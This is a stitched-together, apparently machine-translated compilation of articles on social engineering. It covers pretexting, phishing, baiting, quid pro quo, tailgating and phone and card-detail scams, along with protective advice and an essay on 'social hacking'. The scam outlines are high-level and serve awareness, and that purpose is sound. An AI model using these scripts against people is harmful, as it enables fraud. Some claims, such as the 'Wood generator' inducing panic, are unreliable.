Social engineering is. Social engineering

Don't lose it. Subscribe and receive a link to the article in your email.

Since the advent of computers and the beginning of the development of the Internet, programmers have strived with all their might to ensure computer security. But even today no one has managed to achieve this 100%. However, let's imagine that this result was still achieved thanks to powerful cryptography, enhanced security protocols, reliable software and other security elements. As a result, we get absolutely secure network, and we can safely work in it.

"Wonderful! – you will say, “it’s in the bag!”, but you will be wrong, because this is not enough. Why? Yes, because the benefits of any computer system can only be obtained with the participation of users, i.e. of people. And it is precisely this interaction between a computer and a person that carries a serious danger, and a person often turns out to be the weakest link in the chain of security measures. Moreover, he himself is the reason why security is ineffective.

In the information age, it has become easier to manipulate people, because there is the Internet and mobile connection, which allow interaction without direct contact. There are even special methods that help attackers “operate” with people the way they want. Their complex is called social engineering, and in this article we will try to find out what it is.

Social engineering: what is it and how did it appear?

It’s easy to guess that even the most sophisticated security system is vulnerable when it is controlled by a person, especially if that person is gullible, naive, etc. And when an attack is made on a machine (PC), the victim can be not only the computer, but also the person who works on it.

This kind of attack is called social engineering in the slang of social hackers. In its traditional form, it looks like a telephone call, where the caller pretends to be someone else, wanting to extract confidential information from the subscriber, most often passwords. But in our articles we will consider the phenomenon of social engineering in a broader sense, meaning by it any possible methods psychological manipulations, such as blackmail, playing on feelings, deception, etc.

In this understanding, social engineering is a method of controlling people's actions without the use of technical means. Most often it is perceived as an illegal method of obtaining various valuable information. It is used mainly on the Internet. If you are interested in examples of social engineering, here is one of the most striking:

EXAMPLE: An attacker wants to find out the password for a person’s personal Internet banking account. He calls the victim by phone and introduces himself as a bank employee, asking for the password, citing serious technical problems in the organization’s system. For greater persuasiveness, he names the fictitious (or the real one found out in advance) name of the employee, his position and powers (if necessary). To make the victim believe, a social hacker can fill his story with believable details and play on the feelings of the victim himself. After the attacker has received the information, he still skillfully says goodbye to his “client”, and then uses the password to log in Personal Area and theft of funds.

Oddly enough, even in our time there are people who fall for such bait and trustingly tell social hackers everything they need. And in the arsenal of the latter there may be many techniques and techniques. We will also tell you about them, but a little later.

Social engineering is a science (direction) that appeared relatively recently. Its sociological significance lies in the fact that it operates with specific knowledge that guides, systematizes and optimizes the process of creation, modernization and application of new social realities. In a sense, it complements sociological knowledge, transforming scientific knowledge into algorithms of activity and behavior.

People have been using social engineering in some form since ancient times. For example, in Ancient Rome and Ancient Greece specially trained rhetoricians who were able to convince their interlocutor that he was “wrong” were highly respected. These people participated in diplomatic negotiations and solved state problems. Later, social engineering was adopted by intelligence agencies such as the CIA and the KGB, whose agents successfully impersonated anyone and found out state secrets.

By the early 1970s, telephone hooligans began to appear, disturbing the peace of various companies for the sake of a joke. But over time, someone realized that if you use a technical approach, you can quite easily get different important information. And by the end of the 70s, former telephone hooligans turned into professional social engineers (they began to be called singers), capable of masterfully manipulating people, determining their complexes and fears by just intonation.

When computers appeared, most singers changed their profile, becoming social hackers. Now the concepts of “social engineering” and “social hackers” are synonymous. And with the powerful development of social engineering, new types began to appear and the arsenal of techniques expanded.

Watch this short video to see how social hackers manipulate people.

Social engineering methods

All real examples of social engineering indicate that it easily adapts to any conditions and to any situation, and victims of social hackers, as a rule, do not even suspect that some kind of technique is being used against them, much less know who does it.

All social engineering methods are based on . This is the so-called cognitive basis, according to which people in a social environment always tend to trust someone. Among the main methods of social engineering are:

  • "Trojan horse"
  • Pretexting
  • "Road Apple"
  • Phishing
  • Qui about quo

Let's tell you more about them.

"Trojan horse"

Using " Trojan horse“A person’s curiosity and his desire to benefit are exploited. Social hackers send a letter to the victim’s e-mail containing some interesting attachment, for example, an upgrade for some program, a screen saver with erotic content, exciting news, etc. The method is used to force the user to click on a file that can infect the computer with a virus. Often, as a result, banners appear on the screen, which can be closed only in two ways: by reinstalling the operating system or by paying the attackers a certain amount.

Pretexting

The term “pretexting” means an action that the user performs based on a previously prepared pretext, i.e. script. The goal is for a person to provide specific information or perform a specific action. In most cases, pretexting is used during phone calls, although there are examples of similar attacks on Skype, Viber, ICQ and other instant messengers. But to implement the method, a singer or hacker must not only conduct research on the object in advance - find out his name, date of birth, place of work, amount in the account, etc. With the help of such details, the singer increases the victim's confidence in himself.

"Road Apple"

The road apple method consists of adapting a “Trojan horse” and requires the mandatory use of some kind of physical storage medium. Social hackers can plant bootable flash drives or discs counterfeited as media with interesting and/or unique content. All that is needed is to discreetly place a “road apple” on the victim, for example, in a car in a parking lot, in a bag in an elevator, etc. Or you can simply leave this “fruit” where the victim is likely to see it and take it himself.

Phishing

Phishing is a very common method for obtaining confidential information. In the classic version, this is an “official” email (from a payment service, bank, high-ranking individual, etc.), equipped with signatures and seals. The recipient is required to follow a link to a fake website (there is also everything that speaks about the “officiality and reliability” of the resource) and enter some information, for example, full name, home address, phone number, social network profile addresses, number bank card(and even a CVV code!). Having trusted the site and entered the data, the victim sends it to the scammers, and what happens next is easy to guess.

Qui about quo

The Qui Pro Quo method is used to introduce malware into the systems of various companies. Social hackers call the desired (sometimes any) company, introduce themselves as technical support employees and interview employees for any technical problems in the computer system. If there are malfunctions, the attackers begin to “eliminate” them: they ask the victim to enter a certain command, after which it becomes possible to launch virus software.

The above methods of social engineering are most often encountered in practice, but there are others. In addition, there is also a special type of social engineering, which is also designed to influence a person and his actions, but is done according to a completely different algorithm.

Reverse social engineering

Reverse social engineering and social hackers specializing in it build their activities in three directions:

  • Situations are created that force people to seek help
  • Problem-solving services are advertised (this also includes advance assistance from real specialists)
  • There is “help” and influence

In the case of this type of social engineering, attackers initially study the person or group of people they plan to influence. Their passions, interests, desires and needs are explored, and influence is exerted through them with the help of programs and any other methods of electronic influence. Moreover, programs must first work without failures so as not to cause concern, and only then switch to malicious mode.

Examples of reverse social engineering are also not uncommon, and here is one of them:

Social hackers develop a program for a specific company based on its interests. The program contains a slow-acting virus - after three weeks it is activated, and the system begins to malfunction. Management is contacting the developers to help fix the problem. Being prepared for such a development of events, the attackers send their “specialist” who, while “solving the problem”, gains access to confidential information. The goal has been achieved.

Unlike conventional social engineering, reverse engineering is more labor-intensive, requires special knowledge and skills, and is used to influence a wider audience. But the effect it produces is amazing - sacrifice without resistance, i.e. of his own free will, reveals all his cards to hackers.

Thus, any type of social engineering is almost always used with malicious intent. Some people, of course, talk about its benefits, pointing out that it can be used to solve social problems, maintain social activity, and even adapt social institutions to changing conditions. But despite this, it is most successfully used for:

  • Deceiving people and obtaining confidential information
  • Manipulating and blackmailing people
  • Destabilizing the work of companies for their subsequent destruction
  • Database theft
  • Financial fraud
  • Competitive Intelligence

Naturally, this could not go unnoticed, and methods to counter social engineering appeared.

Protection against social engineering

Today, large companies systematically conduct all kinds of tests for resistance to social engineering. Almost never, the actions of people who come under attack from social hackers are intentional. But that’s what makes them dangerous, because while it’s relatively easy to defend against an external threat, it’s much more difficult to defend against an internal one.

To increase security, company management conducts specialized training, monitors the level of knowledge of its employees, and also initiates internal sabotage itself, which makes it possible to determine the degree of preparedness of people for attacks by social hackers, their reaction, integrity and honesty. Thus, “infected” letters can be sent to E-Mail, contacts can be made on Skype or social networks.

The protection against social engineering itself can be either anthropogenic or technical. In the first case, people's attention is drawn to security issues, the seriousness of this problem is conveyed and measures are taken to instill security policies, methods and actions that increase protection are studied and implemented information support. But all this has one drawback - all these methods are passive, and many people simply ignore the warnings.

As for technical protection, then this includes means that impede access to information and its use. Considering that the most “popular” attacks of social hackers on the Internet are emails and messages, programmers are creating special software that filters all incoming data, and this applies to both private mailboxes, and internal mail. Filters analyze the texts of incoming and outgoing messages. But there is a difficulty here - this software loads the servers, which can slow down and disrupt the system. In addition, it is impossible to provide for all variations in the writing of potentially dangerous messages. However, technology is improving.

And if we talk specifically about the means that prevent the use of the obtained data, they are divided into:

  • Blocking the use of information everywhere except the user’s workplace (authentication data is tied to electronic signatures And serial numbers PC components, physical and IP addresses)
  • Blocking the automatic use of information (this includes the familiar Captcha, where the password is a picture or a distorted part of it)

Both of these methods block the possibility of automation and shift the balance between the value of information and the work of obtaining it towards work. Therefore, even with all the data given out by unsuspecting users, social hackers face serious difficulties in putting it to practical use.

And to protect against social engineering, we advise any ordinary person to simply remain vigilant. When you receive a letter by email, be sure to carefully read the text and links, try to understand what is in the letter, who it came from and why. Don't forget to use antivirus software. If unknown people call from an unfamiliar number, never give out your personal information, especially those related to your finances.

By the way, this video, albeit briefly, but interestingly, talks about how to protect yourself from social engineering.

And finally, we want to introduce you to some of the books on social engineering, including as a field of sociological knowledge, so that if you wish, you can get to know the topic in more detail.

These books contain many practical recommendations on how to master common manipulative techniques and techniques. You will also learn about the most effective methods of social engineering and learn how to recognize them and protect yourself from attacks.

Books on social engineering:

  • Kevin Mitnick "Ghost in the Net"
  • Kevin Mitnick, William Simon "The Art of Invasion"
  • Kevin Mitnick, William Simon "The Art of Deception"
  • Chris Kaspersky "The Secret Weapon of Social Engineering"

Remember that everyone can master the art of managing the actions of others, but these skills must be used for the benefit of people. Sometimes guiding a person and pushing him towards decisions that are beneficial to us is useful and convenient. But it is much more important to be able to identify social hackers and deceivers so as not to become their victim; it is much more important not to be one of them yourself. We wish you wisdom and useful life experience!

Typically, social engineering is a set of techniques aimed at getting a person to behave in a certain way because someone needs it, for example, giving money, providing secret information, or signing something. In order to do this, it is usually necessary to study the human factor, people's reactions to requests, complaints, sources of stress, etc. Knowing the attitudes and reactions of most people, it is not difficult to get them to do certain things.

How social engineering is related to fraud and how it is used to obtain forbidden information.

Let's look at social engineering from these two perspectives. You may have noticed that during economic times, scammers are always especially active. In our age of technology, they are becoming more and more prepared and trained. They employ psychology, social engineering, IT technology and many other special knowledge that help manage people’s actions. Of course, there won’t be enough time to study all their tricks, but it’s still useful to pay attention to the basic principles of the tricks and technologies they use so as not to fall into the traps they set.

What kind of people are most likely to become? How to be a victim of people and circumstances? ? How about us? We have already written about this and more on our website. Now let’s briefly talk about a special science - the knowledge from which is used by “advanced” scammers - social engineers.

Social engineering as a science.

Social engineering is a fairly young science that includes knowledge of the psychology of people and their behavior in critical situations. Social engineering can also be called “a piggy bank of human errors,” since this science absorbs everything related to the human factor and its use.

Such knowledge allows us to predict possible options for human behavior and design various situations in order to elicit a certain reaction. A reaction provoked by a scammer—a social engineer—leads a person to those actions that were originally the scammer’s goal. What could be his goal? Of course, to find out information or penetrate someone else's territory or simply get your money. In this regard, social engineers are also called social hackers.

What kind of person is this social engineer?

This is a person who possesses and skillfully uses knowledge from social engineering. This is a “psychologist” (not a professional, of course), who takes into account complexes, weaknesses, prejudices, habits, reflexes, etc. of people.

Kevin Mitnick, who used to be a social hacker and now consults on security issues, said that it is much easier to lure out the necessary information with the help of tricks than to invent various programs for burglary.

How to protect yourself from “social hackers”?

This can be very difficult, almost impossible, if you don’t know anything about them. And, even knowing their tricks, you can fall for the bait, because they are experts in your spontaneous reactions, reflexes, automatisms, and so on. Be careful!

So, just recently, in January of this year, the Internet was literally full of the following news:


The hackers' calculation was simple - the recipients of the mailing list would fulfill the scammers' request on behalf of the management in order to avoid a reprimand from this management. And so it happened. According to the instructions of social hackers, bank employees of the Belgian bank Crelan performed the actions required by the scammers without additional checks. The email message from the hackers contained a request to urgently complete the transaction. It looked quite believable, since the criminals used copies of company logos and well-known domains.

Psychologists conducted similar experiments before the situation with the Belgian bank. So researchers from England sent employees large corporation messages on behalf of system administrator their companies. The message contained a request to send passwords in connection with a scheduled equipment check. The result was sad - most of the employees (75%) followed the instructions of the attackers.

As we can see, human actions are quite easily programmed. Moreover, quite smart, educated and highly intelligent people can fall for scammers. There is nothing strange here, considering that there are other people who study the actions, automatisms, and reactions of all sorts of different people. Including very smart ones.

EXAMPLES of using social engineering methods

One social engineer describes how he snuck into a place with closed access using people's thinking stereotypes. Security guards are people too! This man (social engineer) observed what badges the employees of the company he wanted had, made himself the same one, printed it on the computer, and went out the back door along with the employees of the establishment.

Of course, he didn’t have a chip for the doors, but he used the “train” method. Its essence is simple. When a group of people accumulates in front of the door, it does not close completely and those walking in front hold the door for those who follow. Common courtesy. After all, they can see from the badge that this is also an employee. The guards see a bunch of people with the same badges and don't pay much attention to them. Moreover, hanging on the wall in large letters is not even an announcement, but a poster warning that everyone must go through one at a time. You cannot hold the door for someone walking behind you to general security! But will a group of friends do this? Who from this company will say to one of the people: “Please go out and come back in with your key (chip) because I don’t know you.” The likelihood of this happening is very low. But this is how you need to do it.

So it turns out that employees violate security requirements with enviable consistency, and scammers use the above-described automatisms with the same consistency. There will always be people who follow the lead of scammers, no matter how much they are warned and taught. Social engineers know this well and therefore don’t worry too much about what trick to come up with. They simply use the same methods. After all, people’s automatisms don’t change much, that’s why they are automatisms. Be original. Don't think stereotypically! Always be wary of unexpected or scary messages. Pay attention to warning notices.

The most used social engineering techniques are based on human weaknesses such as pity, fear and the desire to get rich quickly. If we talk about pity, then hackers use this trait of people the most different ways. For example, they send messages by phone or through social networks asking for help on behalf of your friends or relatives.

Basic methods and techniques of social engineers / social engineering

All methods of social engineering are based on the human factor, that is, on the characteristics of the people’s psyche: giving in to panic, reacting the same way in certain circumstances, losing vigilance, getting tired, empathizing, experiencing fear, and much more. As an example, we will give just a few techniques, and you try to determine for yourself what mental feature the social engineer used here:

    1. One of the plots could be like this: a friend is out of town, he can’t call himself now - it’s a serious problem, money is urgently needed. Asks to send it to your account or bank card number. Even though not everyone will react positively, but only a certain percentage of respondents, the hacker knows that this will happen. This does not bother him, because the messages programmed by him are sent by the machine. There are those who urgently help without checking where these SMS come from. After all, a friend is in trouble.. And due to the urgency, many do not check the source.
    2. With the same calculation, some time ago, many women were sent SMS messages from their son who was in trouble. He himself, of course, cannot call back until his mother sends money to solve this problem. And mothers sent it, no one knows where or to whom. Without double-checking anything (as my son asked).
    3. Also, on behalf of friends, they steal personal information and send malicious links with comments. For example: “hey, do you want to laugh? Follow this link and you can listen to any telephone conversation (or SMS correspondence) that interests you.” Or something like that, the main thing is that you click on the link.

There is also an option in the arsenal of social engineers when they “work” for the buyer. Many users put their items up for sale, for example on Avito. Such a “buyer” is looking for something more expensive (cars, houses, etc.), contacts the real seller and declares his desire to buy your expensive item. Of course, the seller is happy. Wow, how quickly, I didn’t have time to show how everything sold. He is already calculating his income in his mind. True, the buyer is sad to report that he will be able to pick up the item only in two or three days. Well, so that you don’t sell this valuable item to someone else, he asks to remove the ad from Avito and, to guarantee, is ready to pay half or even 75% of the cost right today. “Of course!”, you think, “With pleasure! Let him pay!” The “buyer” asks which card he could use to transfer money to you. And you tell this stranger all the card details. Only instead of gaining his money, you lose all your savings. He may also ask you to tell him the code that will be sent to your phone.

If we talk about such a trait as the desire to get rich quickly and without much effort, then this is a vice using which social engineers can invent and invent for a very long time. After all, people themselves are looking for these “adventures” and are even ready to step on the same rake. That’s why swindlers continue to pretend: then famous brand giving crazy gifts; then a company promising tempting discounts; then a bank offering to take out a loan with a meager interest rate; then an employer who will help you make easy money on the Internet or elsewhere... Only, in order to get anything from this, you must first provide the card details... After all, a new employer or a good bank should transfer money to you somewhere... They gave the card details to an unfamiliar person, you can say goodbye to its contents.

Why do you need to know about this?

Recently, interest in social engineering has become very high. This is evident from the popularity of this request in Internet. This means that the number of hackers and the demand for programs to protect against their attacks will only grow. And not only hackers, swindlers of any kind use social engineering methods for their own purposes.

To be informed and therefore armed, you can read the literature on this topic:

Social engineering and social hackers." Maxim Kuznetsov, Igor Simdyanov.

Be careful! Don't let yourself be deceived.

Social engineering uses knowledge of psychology and human factors. Be extremely careful, social hackers know you very well.

It would also be interesting to know if you knew about social engineering and the cunning techniques used by those people who are behind it?

Sincerely, website If you want to receive new articles, subscribe to our newsletter.

Social engineering- a method of obtaining the necessary access to information, based on the characteristics of human psychology. The main goal of social engineering is to gain access to confidential information, passwords, banking data and other protected systems. Although the term social engineering appeared not so long ago, the method of obtaining information in this way has been used for quite a long time. CIA and KGB employees who want to get some state secrets, politicians and parliamentary candidates, and we ourselves, if we want to get something, often without even realizing it, we use social engineering methods.

In order to protect yourself from the effects of social engineering, you need to understand how it works. Let's look at the main types of social engineering and methods of protecting against them.

Pretexting- this is a set of actions worked out according to a specific, pre-compiled scenario, as a result of which the victim can give out some information or perform a certain action. More often this type The attack involves the use of voice means such as Skype, telephone, etc.

To use this technique, the attacker must initially have some data about the victim (name of employee; position; name of the projects with which he works; date of birth). The attacker initially uses real queries with the names of company employees and, after gaining trust, obtains the information he needs.

Phishing– an Internet fraud technique aimed at obtaining confidential user information - authorization data of various systems. The main type of phishing attack is a fake email sent to the victim that appears to be an official letter from payment system or bank. The letter contains a form for entering personal data (PIN codes, login and password, etc.) or a link to the web page where such a form is located. The reasons for a victim’s trust in such pages can be different: account blocking, system failure, data loss, etc.

Trojan horse– This technique is based on the curiosity, fear or other emotions of users. The attacker sends a letter to the victim via email, the attachment of which contains an antivirus “update”, a key to winning money, or incriminating evidence on an employee. In fact, the attachment contains a malicious program, which, after the user runs it on his computer, will be used by an attacker to collect or change information.

Qui about quo(quid pro quo) – this technique involves the attacker contacting the user via email or corporate phone. An attacker can introduce himself, for example, as a technical support employee and inform about the occurrence of technical problems at the workplace. He further informs about the need to eliminate them. In the process of “solving” such a problem, the attacker pushes the victim to take actions that allow the attacker to execute certain commands or install the necessary software on the victim’s computer.

Road apple– this method is an adaptation of the Trojan horse and consists of using physical media (CDs, flash drives). An attacker usually plants such media in public places on company premises (parking lots, canteens, employee workplaces, toilets). In order for an employee to become interested in this media, an attacker can put a company logo and some kind of signature on the media. For example, “sales data”, “employee salaries”, “tax report” and more.

Reverse social engineering- this type of attack is aimed at creating a situation in which the victim will be forced to turn to the attacker for “help.” For example, an attacker can send a letter with telephone numbers and contacts of the “support service” and after some time create reversible problems in the victim’s computer. In this case, the user will call or email the attacker himself, and in the process of “fixing” the problem, the attacker will be able to obtain the data he needs.


Figure 1 – Main types of social engineering

Countermeasures

The main way to protect against social engineering methods is to train employees. All company employees should be warned about the dangers of disclosing personal information and confidential company information, as well as ways to prevent data leakage. In addition, each company employee, depending on the department and position, should have instructions on how and on what topics one can communicate with the interlocutor, what information can be provided to the technical support service, how and what a company employee must communicate to receive that information. or other information from another employee.

In addition, the following rules can be distinguished:

  • User credentials are the property of the company.
    • On the day of hiring, it must be explained to all employees that the logins and passwords that were issued to them cannot be used for other purposes (on websites, for personal mail, etc.), transferred to third parties or other employees of the company, who do not have the right to do so. For example, very often, when going on vacation, an employee can transfer his authorization data to his colleague so that he can perform some work or view certain data during his absence.
  • It is necessary to conduct introductory and regular training for company employees aimed at increasing knowledge of information security.
    • Conducting such briefings will allow company employees to have up-to-date information about existing social engineering methods, and also not to forget the basic rules for information security.
  • It is mandatory to have safety regulations, as well as instructions to which the user must always have access. The instructions should describe the actions of employees if a particular situation arises.
    • For example, the regulations can specify what needs to be done and where to go if a third party attempts to request confidential information or employee credentials. Such actions will allow you to identify the attacker and prevent information leakage.
  • Employees' computers should always have up-to-date antivirus software.
    • A firewall must also be installed on employee computers.
  • IN corporate network the company needs to use attack detection and prevention systems.
    • It is also necessary to use systems to prevent leaks of confidential information. All this will reduce the risk of phytic attacks.
  • All employees must be instructed how to behave with visitors.
    • Clear rules are needed to establish the identity of the visitor and accompany him. Visitors must always be accompanied by one of the company's employees. If an employee meets a visitor unknown to him, he must inquire in the correct form for what purpose the visitor is in this room and where he is being escorted. If necessary, the employee must report unknown visitors to the security service.
  • It is necessary to limit user rights in the system as much as possible.
    • For example, you can restrict access to websites and prohibit the use removable media. After all, if an employee is unable to get to a phishing site or use a flash drive with “ Trojan horse”, then he will also not be able to lose personal data.

Based on all of the above, we can conclude: the main way to protect against social engineering is to train employees. It is necessary to know and remember that ignorance is not an excuse. Each user of the system should be aware of the dangers of disclosing confidential information and know ways to help prevent leakage. Forewarned is forearmed!

Methods of social engineering - this is exactly what will be discussed in this article, as well as everything related to the manipulation of people, phishing and theft of client databases and more. Andrey Serikov kindly provided us with information, the author of which he is, for which we thank him very much.

A. SERIKOV

A.B.BOROVSKY

INFORMATION TECHNOLOGIES OF SOCIAL HACKING

Introduction

The desire of mankind to achieve perfect fulfillment of assigned tasks served as the development of modern computer technology, and attempts to satisfy the conflicting demands of people led to the development of software products. Data software products not only support performance hardware, but also manage it.

The development of knowledge about man and computer has led to the emergence of a fundamentally new type of system - “human-machine”, where a person can be positioned as hardware, running a stable, functional, multitasking operating system called "psyche".

The subject of the work is the consideration of social hacking as a branch of social programming, where a person is manipulated with the help of human weaknesses, prejudices and stereotypes in social engineering.

Social engineering and its methods

Methods of human manipulation have been known for a long time; they mainly came to social engineering from the arsenal of various intelligence services.

The first known case of competitive intelligence dates back to the 6th century BC and occurred in China, when the Chinese lost the secret of making silk, which was fraudulently stolen by Roman spies.

Social engineering is a science that is defined as a set of methods for manipulating human behavior, based on the use of the weaknesses of the human factor, without the use of technical means.

According to many experts, the greatest threat to information security is posed by social engineering methods, if only because the use of social hacking does not require significant financial investments and thorough knowledge computer technology, and also because people have certain behavioral tendencies that can be used for careful manipulation.

And no matter how much we improve technical systems protection, people will remain people with their weaknesses, prejudices, stereotypes, with the help of which management takes place. Setting up a human “security program” is the most difficult task and does not always lead to guaranteed results, since this filter must be constantly adjusted. Here, the main motto of all security experts sounds more relevant than ever: “Security is a process, not a result.”

Areas of application of social engineering:

  1. general destabilization of the organization’s work in order to reduce its influence and the possibility of subsequent complete destruction of the organization;
  2. financial fraud in organizations;
  3. phishing and other methods of stealing passwords in order to access personal banking data of individuals;
  4. theft of client databases;
  5. competitive intelligence;
  6. general information about the organization, its strengths and weaknesses, with the aim of subsequently destroying this organization in one way or another (often used for raider attacks);
  7. information about the most promising employees with the aim of further “enticing” them to your organization;

Social programming and social hacking

Social programming can be called an applied discipline that deals with targeted influence on a person or group of people in order to change or maintain their behavior in the desired direction. Thus, the social programmer sets himself a goal: mastering the art of managing people. The basic concept of social programming is that many people’s actions and their reactions to one or another external influence are in many cases predictable.

Social programming methods are attractive because either no one will ever know about them, or even if someone guesses about something, it is very difficult to bring such a figure to justice, and in some cases it is possible to “program” people’s behavior, and one person, and a large group. These opportunities fall into the category of social hacking precisely because in all of them people carry out someone else’s will, as if obeying a “program” written by a social hacker.

Social hacking as the possibility of hacking a person and programming him to commit necessary actions comes from social programming - an applied discipline of social engineering, where specialists in this field - social hackers - use techniques of psychological influence and acting borrowed from the arsenal of the intelligence services.

Social hacking is used in most cases when it comes to attacking a person who is part of a computer system. Computer system, which is hacked, does not exist in itself. It contains an important component - a person. And to get information, a social hacker needs to hack a person who works with a computer. In most cases, it is easier to do this than to hack into the victim's computer in an attempt to find out the password.

Typical influence algorithm in social hacking:

All attacks by social hackers fit into one fairly simple scheme:

  1. the purpose of influencing a particular object is formulated;
  2. information about the object is collected in order to detect the most convenient targets of influence;
  3. Based on the collected information, a stage is implemented that psychologists call attraction. Attraction (from Latin Attrahere - to attract, attract) is the creation of the necessary conditions for influencing an object;
  4. forcing a social hacker to take action;

Coercion is achieved by performing the previous stages, i.e., after the attraction is achieved, the victim himself takes the actions necessary for the social engineer.

Based on the information collected, social hackers quite accurately predict the psycho- and sociotype of the victim, identifying not only needs for food, sex, etc., but also the need for love, the need for money, the need for comfort, etc., etc.

And indeed, why try to penetrate this or that company, hack computers, ATMs, organize complex combinations, when you can do everything easier: make a person fall in love with you, who, of his own free will, will transfer money to the specified account or share the necessary money every time information?

Based on the fact that people’s actions are predictable and also subject to certain laws, social hackers and social programmers use both original multi-steps and simple positive and negative techniques based on the psychology of human consciousness, behavioral programs, vibrations of internal organs, logical thinking, imagination, memory, attention. These techniques include:

Wood generator - generates oscillations of the same frequency as the frequency of oscillations of internal organs, after which a resonance effect is observed, as a result of which people begin to feel severe discomfort and a state of panic;

impact on the geography of the crowd - for the peaceful disbandment of extremely dangerous aggressive, large groups of people;

high-frequency and low-frequency sounds - to provoke panic and its reverse effect, as well as other manipulations;

social imitation program - a person determines the correctness of actions by finding out what actions other people consider correct;

claquering program - (based on social imitation) organization of the necessary reaction from the audience;

formation of queues - (based on social imitation) a simple but effective advertising move;

mutual assistance program - a person seeks to repay kindness to those people who have done some kindness to him. The desire to fulfill this program often exceeds all reason;

Social hacking on the Internet

With the advent and development of the Internet - a virtual environment consisting of people and their interactions, the environment for manipulating a person to obtain the necessary information and perform the necessary actions has expanded. Nowadays, the Internet is a means of worldwide broadcasting, a medium for collaboration, communication and covers the entire globe. This is exactly what social engineers use to achieve their goals.

Ways to manipulate a person via the Internet:

IN modern world the owners of almost every company have already realized that the Internet is a very effective and convenient means for expanding their business and its main task is to increase the profits of the entire company. It is known that without information aimed at attracting attention to the desired object, generating or maintaining interest in it and promoting it on the market, advertising is used. Only, due to the fact that the advertising market has long been divided, most types of advertising for most entrepreneurs are wasted money. Internet advertising is not just one of the types of advertising in the media, it is something more, since with the help of Internet advertising people interested in cooperation come to the organization’s website.

Internet advertising, unlike advertising in the media, has many more opportunities and parameters for managing an advertising company. The most important indicator of Internet advertising is that Internet advertising fees are debited only when you switch interested user via an advertising link, which of course makes advertising on the Internet more effective and less costly than advertising in the media. So by advertising on television or in printed publications, they pay for it in full and just wait for potential clients, but clients can respond to advertising or not - it all depends on the quality of production and presentation of advertising on television or newspapers, however, the advertising budget has already been spent and if the advertising did not work, it is wasted. Unlike such media advertising, Internet advertising has the ability to track audience response and manage Internet advertising before its budget is spent; moreover, Internet advertising can be suspended when demand for products has increased and resumed when demand begins to fall.

Another method of influence is the so-called “Killing of forums” where, with the help of social programming, they create anti-advertising for a particular project. Social programmer in in this case, with the help of obvious provocative actions alone, destroys the forum, using several pseudonyms ( nickname) to create an anti-leader group around itself, and attract regular visitors to the project who are dissatisfied with the behavior of the administration. At the end of such events, it becomes impossible to promote products or ideas on the forum. This is what the forum was originally developed for.

Methods of influencing a person via the Internet for the purpose of social engineering:

Phishing is a type of Internet fraud aimed at gaining access to confidential user data - logins and passwords. This operation is achieved through mass mailings emails on behalf of popular brands, as well as personal messages inside various services(Rambler), banks or inside social networks(Facebook). The letter often contains a link to a website that is outwardly indistinguishable from the real one. After the user lands on a fake page, social engineers use various techniques to encourage the user to enter his login and password on the page, which he uses to access a specific site, which allows him to gain access to accounts and bank accounts.

A more dangerous type of fraud than phishing is the so-called pharming.

Pharming is a mechanism for covertly redirecting users to phishing sites. A social engineer distributes special messages to users’ computers. malware, which, after launching on a computer, redirect requests from necessary sites to fake ones. Thus, the attack is highly secrecy, and user participation is minimized - it is enough to wait until the user decides to visit the sites of interest to the social engineer.

Conclusion

Social engineering is a science that emerged from sociology and claims to be the body of knowledge that guides, puts in order and optimizes the process of creating, modernizing and reproducing new (“artificial”) social realities. In a certain way, it “completes” sociological science, completes it at the phase of transforming scientific knowledge into models, projects and designs of social institutions, values, norms, algorithms of activity, relationships, behavior, etc.

Despite the fact that Social Engineering is a relatively young science, it causes great damage to the processes that occur in society.

The simplest methods of protection from the effects of this destructive science are:

Drawing people's attention to safety issues.

Users understanding the seriousness of the problem and accepting the system security policy.

Literature

1. R. Petersen Linux: Complete Guide: per. from English — 3rd ed. - K.: BHV Publishing Group, 2000. – 800 p.

2. From Grodnev Internet in your home. - M.: “RIPOL CLASSIC”, 2001. -480 p.

3. M. V. Kuznetsov Social engineering and social hacking. St. Petersburg: BHV-Petersburg, 2007. - 368 pp.: ill.